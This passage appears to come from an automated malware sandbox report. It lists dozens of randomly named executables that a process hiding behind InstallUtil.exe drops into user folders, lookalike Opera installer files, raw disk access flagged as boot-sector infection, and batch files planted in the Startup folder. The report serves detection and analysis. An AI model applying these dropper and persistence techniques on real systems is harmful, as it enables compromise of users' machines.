                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\oL8szwawgpXgbnICrbhJSivs.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\OVpl7ZoSx7d60PF3UKl2AN2h.exeJump to dropped file
                    Source: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exeFile created: C:\Users\user\AppData\Local\Temp\is-O74DV.tmp\jUzz7ezNBFbkGCxJO9DOH9dj.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exeJump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853201\opera_packageJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\JOJIhk0AcI9isky7MBqL1aC9.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\5TjWUMIFlYsM1w3seMz5vnCW.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\unins000.exe (copy)Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\fZDr3c80pCnwYiNsqew1ltFz.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\XvEaDZrVEGhrm4VFfP27fZuD.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\VaASjTWoLMCHI6PCL8cSdHon.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\esF1MUrWaaVP5MG9h4MWEG3L.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\libwinpthread-1.dll (copy)Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\KSHZwMcueWwTgI47ePC7IUrm.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Y4LnHhMyiOb93nCmM4lvPIko.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\u47GFmiT4x96ZGJgiflf2j9o.exeJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530026645880.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\tX8EOAwWEHtskvnslQFfJ9Qi.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\HAXdOUoV7y3UWdGfKLEhbRIe.exeJump to dropped file
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2403120753276464480.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\ZT6AzWxWIFXd7OjNGkbd7Uza.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\dUxbeTroGHi03yY2SNfS5bOl.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\C83U8puVpwkXcWSHiHRNiMd6.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\uu6kK0oC1Fx2nv3ruwv5SpiV.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\vuP05YoHCo3Zp0Gv9gzt1k3R.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-R5M1I.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\TSj4lbXBm0ozR2JnFqSdYKyt.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-NT0K2.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\GzFms1Le87SMGeCC7Il4yqA4.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\rNCmmZEPp5euqDjbZiBkBeGL.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\BQEn0lhfn4Y5OIYegdFv1wu3.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\s0seUKprDs1WGnkEHPu39VtW.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531585744560.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\rPFTzpNmT3Qntv8acJaf28oV.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\JrAWQORf1HLTD3qpLJ2Euz6u.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\CZMrbdv3aANr0IrdmBiWfjaH.exeJump to dropped file
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeFile created: C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\gT3BUxoUuQnRaSRZpGvobcTI.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\byobdbFYFRrd9psjQQD2jS1U.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exeJump to dropped file
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\bizN5UTpdWpltkCaYrvmwbQI.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\HVNYeIaPfKI1PhwDbNEQTtKf.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\KECo793ffsnuAKrbhcJr4Al2.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\rekePksAYJc4iZuuuIdGaK6L.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\sMiDMUawiFqOcW9q4tC0ZctA.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\JJGhmGOEefZp3FWJtWea5kYv.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\tcyRy6ARtqpoDWzM7VLf6fDh.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\Rgkr8aA7ALrPn82WFNFcy4fg.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\EaLGCYiRQM2XOtVzyy0ADczF.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\gatqNuidCSGWV0xrVKmzpZfK.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\kW8yqxmpQubjD4ulwCtyGF1P.exeJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853491\opera_packageJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\HnpqZr8MiBteqHFNrwWZBXQR.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\KF9G3AcCbu7Zl4IuQK8qDucc.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\j9oiPedoYJq65MrsMIBEWZ24.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\LHg0H4yHSfuTfUKbSoOyunge.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\EjtrSvV6de28lGZAjtWMHEkL.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\r5rrZo2uJpDKzb6r7Ao0yzpg.exeJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Opera_108.0.5067.24_Autoupdate_x64[3].exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\lUtN2EBQTg4XAhTAimO3WEPd.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\UyY0AJkHrNf9ELHT0hUQo1vI.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\bsQavSmX9wFQ2mntPGaltaow.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\VtYWoqhIxv66SdBYR6iCW9pR.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\sgtzC1bBRzEH97LXPXHm4FVd.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\JPkWbPiELiY3dVd0ezptZ3ko.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\yXBgs4CMjv6Y3CFxbTDDkpre.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\xKfiOAaKjAfRiycTLJ3RQV4l.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-05C7R.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\lsTOGQhYLrM0d7OftxaupYqW.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\uYudt0flCl0e0fQZ8vnWLOhm.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\XPVSCvEdYfmDBcCxUZISEmv8.exeJump to dropped file
                    Source: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exeFile created: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\2h93Z8eIGDBBod8joPEiBXPj.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\N3UpPkceW0KxiJBLNKuqtisH.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Q54LGmnZmhktpXP3y7EOrtRY.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\8p4ak8QNfpnbvonzNVxC2iTG.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\WeQ8sR5f2BmkTxQKPAa5RFoc.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\OkQwRZm1uDGIMvmp1IlBrcDl.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\oYJcrFAFnphIaAQPo8IrBCWh.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-PANN7.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeJump to dropped file
                    Source: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exeFile created: C:\Users\user\AppData\Local\Temp\is-H44T4.tmp\qvx2vm8LJ8TphvujtDcRyl5q.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeJump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530974345608.dllJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530527645904.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\J8LomUCEiQeMvIGqlnqM0LZ5.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\libogg-0.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\XgAVLWIvGKK9IeCrDuWuJavo.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Imc6gJg8H4cjDDr1J0xEqhfy.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\OjJASGUU0KKc5KDT8IvLJBEe.exeJump to dropped file
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531803244640.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\PPRbCMR3JwR3Rpdv3d5rSgFs.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\E6QKqd9T2KlIZuLZuluVgjTV.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\W1VpqB7zp2RfA2iQxRvPzC6c.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeFile created: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853491\opera_packageJump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853201\opera_packageJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085307048.log
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085338724.log
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085318383.log
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085332766.log

                    Boot Survival

                    barindex
                    Contains functionality to infect the boot sector
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive016_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive017_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive017_2_009BFE99
                    Drops script or batch files to the startup folder
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JLskMOTKdJylvoD4fywb2xq9.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WbZbZUFbJRp9V9DhX6D6SbsF.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V4vz7ooYcwTTy9p6mMfXbhaV.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KCLvXEQADdAafKsEPtvKcJuW.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X3kzXxi5tUUbK9D3UM8FR6yB.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V2Ua9TLWP47cusgrbbxD2ie8.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7CPf1BbnKQFsIHTCUVgPW2b1.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nnz2eQ1k1PBdAfnlioMuMIp1.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SQOPRbGOQslr1pMs9iyrT8Qb.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Oqdv9aQZnmchlZhQPGADj1vm.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wahfCAc9rxN7QFp93csP92wp.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d78Ytvj4V0ta2ZiqFQElQpre.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VFP6UagohjQssqJ93M7nVGAA.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nJ0fjaFyPdUTkd27RbJpgLbV.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S8rXbw1cOVjTK1xkd0JIGo0q.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tUicDr528bg57zTahAKCbWLd.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IZ5Y7BJc8EYdvXcnIuceiXSu.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx0sIwDO9BmAGJHgVaGYhDQe.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oNjbvmMzdD4XPQKq54zqlNic.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kJdsA9VA9hS9yUHHqg0ft5DV.batJump to dropped file
